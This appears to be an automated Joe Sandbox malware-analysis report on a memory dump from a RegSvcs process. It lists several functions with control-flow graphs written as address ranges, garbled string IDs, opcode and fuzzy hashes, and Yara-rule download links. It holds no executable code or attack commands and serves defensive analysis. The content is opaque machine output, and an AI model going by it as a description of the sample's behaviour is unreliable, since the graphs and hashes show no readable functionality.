                                                                                                                                                                                control_flow_graph 0 19a66b8-19a66ed 1 19a6b1c-19a6b20 0->1 2 19a66f3-19a6716 0->2 3 19a6b39-19a6b47 1->3 4 19a6b22-19a6b36 1->4 11 19a671c-19a6729 2->11 12 19a67c4-19a67c8 2->12 9 19a6bb8-19a6bcd 3->9 10 19a6b49-19a6b5e 3->10 18 19a6bcf-19a6bd2 9->18 19 19a6bd4-19a6be1 9->19 20 19a6b60-19a6b63 10->20 21 19a6b65-19a6b72 10->21 24 19a672b-19a6736 11->24 25 19a6738 11->25 15 19a67ca-19a67d8 12->15 16 19a6810-19a6819 12->16 15->16 36 19a67da-19a67f5 15->36 22 19a6c2f 16->22 23 19a681f-19a6829 16->23 26 19a6be3-19a6c1e 18->26 19->26 27 19a6b74-19a6bb5 20->27 21->27 30 19a6c34-19a6c42 22->30 23->1 28 19a682f-19a6838 23->28 31 19a673a-19a673c 24->31 25->31 79 19a6c25-19a6c2c 26->79 34 19a683a-19a683f 28->34 35 19a6847-19a6853 28->35 46 19a6c49-19a6c4a 30->46 47 19a6c44-19a6c48 30->47 31->12 38 19a6742-19a67a4 31->38 34->35 35->30 41 19a6859-19a685f 35->41 60 19a6803 36->60 61 19a67f7-19a6801 36->61 90 19a67aa-19a67c1 38->90 91 19a67a6 38->91 42 19a6b06-19a6b0a 41->42 43 19a6865-19a6875 41->43 42->22 48 19a6b10-19a6b16 42->48 58 19a6889-19a688b 43->58 59 19a6877-19a6887 43->59 54 19a6c4c-19a6c4d 46->54 55 19a6c51-19a6c64 46->55 47->46 48->1 48->28 66 19a6c7d-19a6c84 55->66 67 19a6c66-19a6c7c 55->67 63 19a688e-19a6894 58->63 59->63 64 19a6805-19a6807 60->64 61->64 63->42 72 19a689a-19a68a9 63->72 64->16 73 19a6809 64->73 75 19a68af 72->75 76 19a6957-19a6982 call 19a6500 * 2 72->76 73->16 81 19a68b2-19a68c3 75->81 96 19a6988-19a698c 76->96 97 19a6a6c-19a6a86 76->97 81->30 83 19a68c9-19a68db 81->83 83->30 86 19a68e1-19a68f9 83->86 148 19a68fb call 19a6c98 86->148 149 19a68fb call 19a6c88 86->149 89 19a6901-19a6911 89->42 93 19a6917-19a691a 89->93 90->12 91->90 94 19a691c-19a6922 93->94 95 19a6924-19a6927 93->95 94->95 98 19a692d-19a6930 94->98 95->22 95->98 96->42 100 19a6992-19a6996 96->100 97->1 115 19a6a8c-19a6a90 97->115 103 19a6938-19a693b 98->103 104 19a6932-19a6936 98->104 101 19a6998-19a69a5 100->101 102 19a69be-19a69c4 100->102 118 19a69a7-19a69b2 101->118 119 19a69b4 101->119 107 19a69ff-19a6a05 102->107 108 19a69c6-19a69ca 102->108 103->22 106 19a6941-19a6945 103->106 104->103 104->106 106->22 113 19a694b-19a6951 106->113 110 19a6a11-19a6a17 107->110 111 19a6a07-19a6a0b 107->111 108->107 114 19a69cc-19a69d5 108->114 116 19a6a19-19a6a1d 110->116 117 19a6a23-19a6a25 110->117 111->79 111->110 113->76 113->81 120 19a69d7-19a69dc 114->120 121 19a69e4-19a69fa 114->121 122 19a6acc-19a6ad0 115->122 123 19a6a92-19a6a9c call 19a53a8 115->123 116->42 116->117 124 19a6a5a-19a6a5c 117->124 125 19a6a27-19a6a30 117->125 126 19a69b6-19a69b8 118->126 119->126 120->121 121->42 122->79 127 19a6ad6-19a6ada 122->127 123->122 136 19a6a9e-19a6ab3 123->136 124->42 132 19a6a62-19a6a69 124->132 130 19a6a3f-19a6a55 125->130 131 19a6a32-19a6a37 125->131 126->42 126->102 127->79 134 19a6ae0-19a6aed 127->134 130->42 131->130 139 19a6aef-19a6afa 134->139 140 19a6afc 134->140 136->122 145 19a6ab5-19a6aca 136->145 142 19a6afe-19a6b00 139->142 140->142 142->42 142->79 145->1 145->122 148->89 149->89
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                                                                • API String ID: 0-1435242062
                                                                                                                                                                                • Opcode ID: 184545df36963abc63bdfcde7cc2a256ca626c643e11571b8097b0555b083987
                                                                                                                                                                                • Instruction ID: e720a28756b5d9ceda2c161a7e67d3536414b7c70d2eb0f8534864c83e72c470
                                                                                                                                                                                • Opcode Fuzzy Hash: 184545df36963abc63bdfcde7cc2a256ca626c643e11571b8097b0555b083987
                                                                                                                                                                                • Instruction Fuzzy Hash: 85128D30A006098FCB15CF69D984A9EBFF6FF88311F598569E909DB261DB30EC45CB90
                                                                                                                                                                                Function 019A19A9 Relevance: 5.5, Strings: 4, Instructions: 472COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 457 19a19a9-19a1a13 461 19a1a35-19a1a42 457->461 462 19a1a15-19a1a34 457->462 465 19a1a49-19a1a4a 461->465 466 19a1a44-19a1a48 461->466 467 19a1a4c-19a1a4e 465->467 468 19a1a51-19a1a54 465->468 466->465 469 19a1a50 467->469 470 19a1a55-19a1a84 467->470 468->470 469->468 472 19a1a9f 470->472 473 19a1a86-19a1a8d 470->473 477 19a1aa7 472->477 474 19a1a8f-19a1a94 473->474 475 19a1a96-19a1a9d 473->475 476 19a1aaa-19a1abe 474->476 475->476 479 19a1ac0-19a1ac7 476->479 480 19a1ad4-19a1adc 476->480 477->476 481 19a1ac9-19a1acb 479->481 482 19a1acd-19a1ad2 479->482 483 19a1ade-19a1ae2 480->483 481->483 482->483 485 19a1b42-19a1b45 483->485 486 19a1ae4-19a1af9 483->486 487 19a1b8d-19a1b93 485->487 488 19a1b47-19a1b5c 485->488 486->485 494 19a1afb-19a1afe 486->494 489 19a1b99-19a1b9b 487->489 490 19a268e 487->490 488->487 498 19a1b5e-19a1b62 488->498 489->490 492 19a1ba1-19a1ba6 489->492 495 19a2693-19a2c4d 490->495 496 19a263c-19a2640 492->496 497 19a1bac 492->497 499 19a1b1d-19a1b3b call 19a02a8 494->499 500 19a1b00-19a1b02 494->500 581 19a2c59 495->581 502 19a2642-19a2645 496->502 503 19a2647-19a268d 496->503 497->496 504 19a1b6a-19a1b88 call 19a02a8 498->504 505 19a1b64-19a1b68 498->505 499->485 500->499 506 19a1b04-19a1b07 500->506 502->495 502->503 504->487 505->487 505->504 506->485 510 19a1b09-19a1b1b 506->510 510->485 510->499 581->581
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                                                                • API String ID: 0-4015495023
                                                                                                                                                                                • Opcode ID: aba4dc235b204baea54ed6e46730b69080cd40dd2110b9543cdcbb59e1ec2b30
                                                                                                                                                                                • Instruction ID: 20465e735eb5993eb9c003bae55e90b1bbe881c852e77471cc1e283784b30f36
                                                                                                                                                                                • Opcode Fuzzy Hash: aba4dc235b204baea54ed6e46730b69080cd40dd2110b9543cdcbb59e1ec2b30
                                                                                                                                                                                • Instruction Fuzzy Hash: F712F4399953DADBC7018BB48C941ACFBB0BFC5310B19499AC4E067281DB7F6885E7D2
                                                                                                                                                                                Function 019AD608 Relevance: 5.3, Strings: 4, Instructions: 270COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 582 19ad608-19ad61b 583 19ad61d-19ad620 582->583 584 19ad627-19ad62d 582->584 583->584 585 19ad622-19ad625 583->585 586 19ad62f-19ad632 584->586 587 19ad641-19ad675 call 19aabd8 584->587 585->584 588 19ad678-19ad6d0 585->588 586->587 589 19ad634-19ad636 586->589 593 19ad6d7-19ad71e 588->593 589->587 590 19ad638-19ad63b 589->590 590->587 590->593 608 19ad723-19ad745 593->608 613 19ad748-19ad74c 608->613 614 19ad74d-19ad757 608->614 613->614 615 19ad759-19ad75d 614->615 616 19ad777-19ad794 614->616 659 19ad760 call 19ad558 615->659 660 19ad760 call 19ad4b8 615->660 661 19ad760 call 19ad4a8 615->661 662 19ad760 call 19ad608 615->662 663 19ad760 call 19ad821 615->663 664 19ad760 call 19ad855 615->664 616->608 621 19ad796 616->621 617 19ad763-19ad774 622 19ad798-19ad79a 621->622 623 19ad79d 621->623 624 19ad79c 622->624 625 19ad7a1-19ad7cd 622->625 623->625 624->623 627 19ad7d8-19ad7e1 625->627 628 19ad7cf-19ad7d6 625->628 630 19ad7ec 627->630 631 19ad7e3-19ad7ea 627->631 629 19ad7f3-19ad7fc 628->629 632 19ad802-19ad81f 629->632 633 19ad890-19ad894 629->633 630->629 631->629 635 19ad89d-19ad8b9 632->635 665 19ad897 call 19ad9a3 633->665 666 19ad897 call 19ad9b0 633->666 638 19ad8bb-19ad8be 635->638 639 19ad8c0-19ad91a call 19aabe8 635->639 638->639 640 19ad922-19ad92b 638->640 639->640 641 19ad92d-19ad930 640->641 642 19ad932-19ad968 640->642 641->642 644 19ad997-19ad99d 641->644 642->644 654 19ad96a-19ad98f call 19aabf8 642->654 654->644 659->617 660->617 661->617 662->617 663->617 664->617 665->635 666->635
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8bq$Haq$Haq$TJbq
                                                                                                                                                                                • API String ID: 0-1338622358
                                                                                                                                                                                • Opcode ID: 23e49c662d96f995de5670bbebee7090c4fc333e6d1094c9d9ceed8fed8bd668
                                                                                                                                                                                • Instruction ID: 0e8cc98a824d505dee307e645e5a7661e876d068db336ad74cf4d814ee20cac1
                                                                                                                                                                                • Opcode Fuzzy Hash: 23e49c662d96f995de5670bbebee7090c4fc333e6d1094c9d9ceed8fed8bd668
                                                                                                                                                                                • Instruction Fuzzy Hash: EC919F74B002048FDB09DBACC484AAEBBFAFF89320F544455E509EB7A5CA31DC46CB91
                                                                                                                                                                                Function 019ACEE7 Relevance: 5.3, Strings: 4, Instructions: 261COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 667 19acee7-19acf2e 668 19acf30-19acf34 667->668 669 19acf35-19acf67 call 19ac7e0 667->669 668->669 674 19acf6d-19acf6f 669->674 675 19ad143-19ad14e 669->675 676 19ad155-19ad160 674->676 677 19acf75-19acf79 674->677 675->676 683 19ad167-19ad172 676->683 677->676 678 19acf7f-19acfb7 call 19aabd8 677->678 678->683 692 19acfbd-19acfc1 678->692 687 19ad179-19ad184 683->687 691 19ad18b-19ad1b7 687->691 727 19ad1be-19ad1ea 691->727 693 19acfcd-19acfd1 692->693 694 19acfc3-19acfc7 692->694 696 19acfdc-19acfe0 693->696 697 19acfd3-19acfda 693->697 694->687 694->693 698 19acff8-19acffc 696->698 699 19acfe2-19acfe6 696->699 697->698 702 19acffe-19ad000 698->702 703 19ad003-19ad00a 698->703 700 19acfe8-19acfef 699->700 701 19acff1 699->701 700->698 701->698 702->703 705 19ad00c 703->705 706 19ad013-19ad017 703->706 705->706 707 19ad0c8-19ad0cb 705->707 708 19ad131-19ad13c 705->708 709 19ad066-19ad069 705->709 710 19ad095-19ad098 705->710 711 19ad01d-19ad021 706->711 712 19ad0f6-19ad0f9 706->712 714 19ad0cd 707->714 715 19ad0d2-19ad0f1 707->715 708->675 716 19ad06b-19ad06e 709->716 717 19ad074-19ad093 709->717 721 19ad09a-19ad09d 710->721 722 19ad0a3-19ad0c6 710->722 711->708 718 19ad027-19ad02a 711->718 719 19ad0fb-19ad0fe 712->719 720 19ad109-19ad12c 712->720 714->715 742 19ad04f-19ad053 715->742 716->691 716->717 717->742 724 19ad02c 718->724 725 19ad031-19ad04d 718->725 719->720 726 19ad100-19ad103 719->726 720->742 721->722 721->727 722->742 724->725 725->742 726->720 731 19ad1f1-19ad24e 726->731 727->731 752 19ad24e 731->752 753 19ad255-19ad263 731->753 779 19ad056 call 19ad558 742->779 780 19ad056 call 19ad4b8 742->780 781 19ad056 call 19ad4a8 742->781 782 19ad056 call 19ad608 742->782 745 19ad05c-19ad063 752->753 754 19ad250-19ad254 752->754 756 19ad2c5-19ad329 753->756 757 19ad265-19ad268 753->757 754->753 774 19ad32b-19ad330 756->774 775 19ad332-19ad342 756->775 757->756 758 19ad26a-19ad279 757->758 762 19ad27b-19ad281 758->762 763 19ad291-19ad295 758->763 766 19ad283 762->766 767 19ad285-19ad287 762->767 764 19ad2bd-19ad2c4 763->764 765 19ad297-19ad2b7 763->765 765->764 766->763 767->763 776 19ad347-19ad348 774->776 775->776 779->745 780->745 781->745 782->745
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $Haq$Haq$Haq
                                                                                                                                                                                • API String ID: 0-432640594
                                                                                                                                                                                • Opcode ID: 06b6e2f7a4cf35d5a205eade51c4106fe4a4e675d9a3176651886c5ed3393b39
                                                                                                                                                                                • Instruction ID: 59ea722da4063554c637a628bc8c1ecb76e30b5a83b763ac5e8d8e8343fffd25
                                                                                                                                                                                • Opcode Fuzzy Hash: 06b6e2f7a4cf35d5a205eade51c4106fe4a4e675d9a3176651886c5ed3393b39
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C9125307042549FDB069FB8885866E7FB6FFC6221B54456AE91ACB3D2CE34DC06CB91
                                                                                                                                                                                Function 019ACF30 Relevance: 5.2, Strings: 4, Instructions: 233COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 783 19acf30-19acf67 call 19ac7e0 789 19acf6d-19acf6f 783->789 790 19ad143-19ad14e 783->790 791 19ad155-19ad160 789->791 792 19acf75-19acf79 789->792 790->791 798 19ad167-19ad172 791->798 792->791 793 19acf7f-19acfb7 call 19aabd8 792->793 793->798 807 19acfbd-19acfc1 793->807 802 19ad179-19ad184 798->802 806 19ad18b-19ad1b7 802->806 842 19ad1be-19ad1ea 806->842 808 19acfcd-19acfd1 807->808 809 19acfc3-19acfc7 807->809 811 19acfdc-19acfe0 808->811 812 19acfd3-19acfda 808->812 809->802 809->808 813 19acff8-19acffc 811->813 814 19acfe2-19acfe6 811->814 812->813 817 19acffe-19ad000 813->817 818 19ad003-19ad00a 813->818 815 19acfe8-19acfef 814->815 816 19acff1 814->816 815->813 816->813 817->818 820 19ad00c 818->820 821 19ad013-19ad017 818->821 820->821 822 19ad0c8-19ad0cb 820->822 823 19ad131-19ad13c 820->823 824 19ad066-19ad069 820->824 825 19ad095-19ad098 820->825 826 19ad01d-19ad021 821->826 827 19ad0f6-19ad0f9 821->827 829 19ad0cd 822->829 830 19ad0d2-19ad0f1 822->830 823->790 831 19ad06b-19ad06e 824->831 832 19ad074-19ad093 824->832 836 19ad09a-19ad09d 825->836 837 19ad0a3-19ad0c6 825->837 826->823 833 19ad027-19ad02a 826->833 834 19ad0fb-19ad0fe 827->834 835 19ad109-19ad12c 827->835 829->830 857 19ad04f-19ad053 830->857 831->806 831->832 832->857 839 19ad02c 833->839 840 19ad031-19ad04d 833->840 834->835 841 19ad100-19ad103 834->841 835->857 836->837 836->842 837->857 839->840 840->857 841->835 846 19ad1f1-19ad24e 841->846 842->846 867 19ad24e 846->867 868 19ad255-19ad263 846->868 894 19ad056 call 19ad558 857->894 895 19ad056 call 19ad4b8 857->895 896 19ad056 call 19ad4a8 857->896 897 19ad056 call 19ad608 857->897 860 19ad05c-19ad063 867->868 869 19ad250-19ad254 867->869 871 19ad2c5-19ad329 868->871 872 19ad265-19ad268 868->872 869->868 889 19ad32b-19ad330 871->889 890 19ad332-19ad342 871->890 872->871 873 19ad26a-19ad279 872->873 877 19ad27b-19ad281 873->877 878 19ad291-19ad295 873->878 881 19ad283 877->881 882 19ad285-19ad287 877->882 879 19ad2bd-19ad2c4 878->879 880 19ad297-19ad2b7 878->880 880->879 881->878 882->878 891 19ad347-19ad348 889->891 890->891 894->860 895->860 896->860 897->860
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $Haq$Haq$Haq
                                                                                                                                                                                • API String ID: 0-432640594
                                                                                                                                                                                • Opcode ID: 544981baa67eb6e01de025aa5014911eac9d1a197682a4ca458d3312eea5087f
                                                                                                                                                                                • Instruction ID: 2df20b9cfbaf9242847532a13db87c4a25fa9304964bc25b2c1f8eaed4191b15
                                                                                                                                                                                • Opcode Fuzzy Hash: 544981baa67eb6e01de025aa5014911eac9d1a197682a4ca458d3312eea5087f
                                                                                                                                                                                • Instruction Fuzzy Hash: 588102307042049FDB165F78885866E7EA6BFC6361F948229E92ACB3D1CE359C06CB91
                                                                                                                                                                                Function 019A8D90 Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4']q$4']q
                                                                                                                                                                                • API String ID: 0-3120983240
                                                                                                                                                                                • Opcode ID: 42310754a9a76dcf066f84736083d8aabfbf7badc62d73c7b004000260481d44
                                                                                                                                                                                • Instruction ID: d9235b8ed5d0e3d103b1cf0fa853d0edeba0c6a641c03d818070409a2c7eb102
                                                                                                                                                                                • Opcode Fuzzy Hash: 42310754a9a76dcf066f84736083d8aabfbf7badc62d73c7b004000260481d44
                                                                                                                                                                                • Instruction Fuzzy Hash: B3C1C5706006068FDB15DF6CC480ABABBFAFF84305F95896AD609CB252D735E949CBD0
                                                                                                                                                                                Function 019A5460 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2749 19a5460-19a546d 2751 19a546f-19a5473 2749->2751 2752 19a5475-19a5477 2749->2752 2751->2752 2753 19a547c-19a5487 2751->2753 2754 19a5688-19a568f 2752->2754 2755 19a548d-19a5494 2753->2755 2756 19a5690 2753->2756 2757 19a549a-19a54a9 2755->2757 2758 19a5629-19a562f 2755->2758 2760 19a5695-19a56cd 2756->2760 2759 19a54af-19a54be 2757->2759 2757->2760 2761 19a5631-19a5633 2758->2761 2762 19a5635-19a5639 2758->2762 2768 19a54d3-19a54d6 2759->2768 2769 19a54c0-19a54c3 2759->2769 2780 19a56cf-19a56d4 2760->2780 2781 19a56d6-19a56da 2760->2781 2761->2754 2763 19a563b-19a5641 2762->2763 2764 19a5686 2762->2764 2763->2756 2766 19a5643-19a5646 2763->2766 2764->2754 2766->2756 2770 19a5648-19a565d 2766->2770 2771 19a54e2-19a54e8 2768->2771 2773 19a54d8-19a54db 2768->2773 2769->2771 2772 19a54c5-19a54c8 2769->2772 2789 19a565f-19a5665 2770->2789 2790 19a5681-19a5684 2770->2790 2782 19a54ea-19a54f0 2771->2782 2783 19a5500-19a551d 2771->2783 2775 19a55c9-19a55cf 2772->2775 2776 19a54ce 2772->2776 2777 19a552e-19a5534 2773->2777 2778 19a54dd 2773->2778 2784 19a55d1-19a55d7 2775->2784 2785 19a55e7-19a55f1 2775->2785 2786 19a55f4-19a5601 2776->2786 2787 19a554c-19a555e 2777->2787 2788 19a5536-19a553c 2777->2788 2778->2786 2791 19a56e0-19a56e2 2780->2791 2781->2791 2792 19a54f2 2782->2792 2793 19a54f4-19a54fe 2782->2793 2823 19a5526-19a5529 2783->2823 2796 19a55db-19a55e5 2784->2796 2797 19a55d9 2784->2797 2785->2786 2814 19a5603-19a5607 2786->2814 2815 19a5615-19a5617 2786->2815 2808 19a556e-19a5591 2787->2808 2809 19a5560-19a556c 2787->2809 2799 19a553e 2788->2799 2800 19a5540-19a554a 2788->2800 2801 19a5677-19a567a 2789->2801 2802 19a5667-19a5675 2789->2802 2790->2754 2794 19a56f7-19a56fe 2791->2794 2795 19a56e4-19a56f6 2791->2795 2792->2783 2793->2783 2796->2785 2797->2785 2799->2787 2800->2787 2801->2756 2804 19a567c-19a567f 2801->2804 2802->2756 2802->2801 2804->2789 2804->2790 2808->2756 2827 19a5597-19a559a 2808->2827 2824 19a55b9-19a55c7 2809->2824 2814->2815 2817 19a5609-19a560d 2814->2817 2818 19a561b-19a561e 2815->2818 2817->2756 2819 19a5613 2817->2819 2818->2756 2820 19a5620-19a5623 2818->2820 2819->2818 2820->2757 2820->2758 2823->2786 2824->2786 2827->2756 2828 19a55a0-19a55b2 2827->2828 2828->2824
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ,aq$,aq
                                                                                                                                                                                • API String ID: 0-2990736959
                                                                                                                                                                                • Opcode ID: 4cb232fde9deb606441b88045334ff294ae51e804c9b7a87b93f90bd9e7dcd9a
                                                                                                                                                                                • Instruction ID: 7480ed63bb28cd424b99aeddb094cfec5a1365f6ae091e83f0d98a596c7d7d62
                                                                                                                                                                                • Opcode Fuzzy Hash: 4cb232fde9deb606441b88045334ff294ae51e804c9b7a87b93f90bd9e7dcd9a
                                                                                                                                                                                • Instruction Fuzzy Hash: C1819E30B00505CFEB14CF6DD484AAABBBAFF88215B968469D509DB365DB31EC45CB90
                                                                                                                                                                                Function 019A4EF0 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2889 19a4ef0-19a4f22 2890 19a4f38-19a4f43 2889->2890 2891 19a4f24-19a4f28 2889->2891 2894 19a4feb-19a5017 2890->2894 2895 19a4f49-19a4f4b 2890->2895 2892 19a4f2a-19a4f36 2891->2892 2893 19a4f50-19a4f57 2891->2893 2892->2890 2892->2893 2896 19a4f59-19a4f60 2893->2896 2897 19a4f77-19a4f80 2893->2897 2901 19a501e-19a505a 2894->2901 2898 19a4fe3-19a4fe8 2895->2898 2896->2897 2899 19a4f62-19a4f6d 2896->2899 3003 19a4f82 call 19a5068 2897->3003 3004 19a4f82 call 19a4ef0 2897->3004 2899->2901 2902 19a4f73-19a4f75 2899->2902 2921 19a505c-19a5060 2901->2921 2922 19a5061-19a5062 2901->2922 2902->2898 2903 19a4f88-19a4f8a 2904 19a4f8c-19a4f90 2903->2904 2905 19a4f92-19a4f9a 2903->2905 2904->2905 2907 19a4fad-19a4fbe 2904->2907 2908 19a4fa9-19a4fab 2905->2908 2909 19a4f9c-19a4fa1 2905->2909 3005 19a4fc1 call 19a5978 2907->3005 3006 19a4fc1 call 19a5968 2907->3006 2908->2898 2909->2908 2913 19a4fc7-19a4fcc 2915 19a4fce-19a4fd7 2913->2915 2916 19a4fe1 2913->2916 2998 19a4fd9 call 19a9f6d 2915->2998 2999 19a4fd9 call 19a9eb0 2915->2999 3000 19a4fd9 call 19a9ec0 2915->3000 2916->2898 2918 19a4fdf 2918->2898 2921->2922 2923 19a5069-19a5076 2922->2923 2924 19a5064 2922->2924 2925 19a5078-19a507e 2923->2925 2926 19a5085-19a5097 2923->2926 2924->2923 2925->2926 2928 19a512b-19a512d 2926->2928 2929 19a509d-19a50a1 2926->2929 3001 19a512f call 19a52bb 2928->3001 3002 19a512f call 19a52c8 2928->3002 2930 19a50a3-19a50af 2929->2930 2931 19a50b1-19a50be 2929->2931 2939 19a50c0-19a50ca 2930->2939 2931->2939 2932 19a5135-19a513b 2933 19a513d-19a5143 2932->2933 2934 19a5147-19a514e 2932->2934 2937 19a51a9-19a5208 2933->2937 2938 19a5145 2933->2938 2953 19a520f-19a521a 2937->2953 2938->2934 2942 19a50cc-19a50db 2939->2942 2943 19a50f7-19a50fb 2939->2943 2951 19a50eb-19a50f5 2942->2951 2952 19a50dd-19a50e4 2942->2952 2944 19a50fd-19a5103 2943->2944 2945 19a5107-19a510b 2943->2945 2948 19a5151-19a51a2 2944->2948 2949 19a5105 2944->2949 2945->2934 2950 19a510d-19a5111 2945->2950 2948->2937 2949->2934 2950->2953 2954 19a5117-19a5129 2950->2954 2951->2943 2952->2951 2962 19a521c-19a5220 2953->2962 2963 19a5221-19a5222 2953->2963 2954->2934 2962->2963 2966 19a5229-19a5233 2963->2966 2967 19a5224 2963->2967 2968 19a5239-19a523b 2966->2968 2969 19a5235-19a5237 2966->2969 2967->2966 2972 19a524c-19a524e 2968->2972 2973 19a523d-19a5241 2968->2973 2971 19a52b1-19a52b4 2969->2971 2978 19a5250-19a5254 2972->2978 2979 19a5261-19a5267 2972->2979 2976 19a5243-19a5245 2973->2976 2977 19a5247-19a524a 2973->2977 2976->2971 2977->2971 2981 19a525a-19a525f 2978->2981 2982 19a5256-19a5258 2978->2982 2983 19a5269-19a5290 2979->2983 2984 19a5292-19a5294 2979->2984 2981->2971 2982->2971 2986 19a529b-19a529d 2983->2986 2984->2986 2990 19a529f-19a52a1 2986->2990 2991 19a52a3-19a52a5 2986->2991 2990->2971 2992 19a52ae 2991->2992 2993 19a52a7-19a52ac 2991->2993 2992->2971 2993->2971 2998->2918 2999->2918 3000->2918 3001->2932 3002->2932 3003->2903 3004->2903 3005->2913 3006->2913
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Haq$Haq
                                                                                                                                                                                • API String ID: 0-4016896955
                                                                                                                                                                                • Opcode ID: 70142d9260d0484acdce2cac3735d985f4b5bd246e16f58e00c21af8c2f2dafe
                                                                                                                                                                                • Instruction ID: 13819ba3768c2dfbc29ce4db00ffa28f7c1016b0d7ea1ede30e709818c477226
                                                                                                                                                                                • Opcode Fuzzy Hash: 70142d9260d0484acdce2cac3735d985f4b5bd246e16f58e00c21af8c2f2dafe
                                                                                                                                                                                • Instruction Fuzzy Hash: 3361D2317042518FEB168F28C848BAA7FFAFF88305F498469E809CB291CB75C805DBD1
                                                                                                                                                                                Function 019A8BF0 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
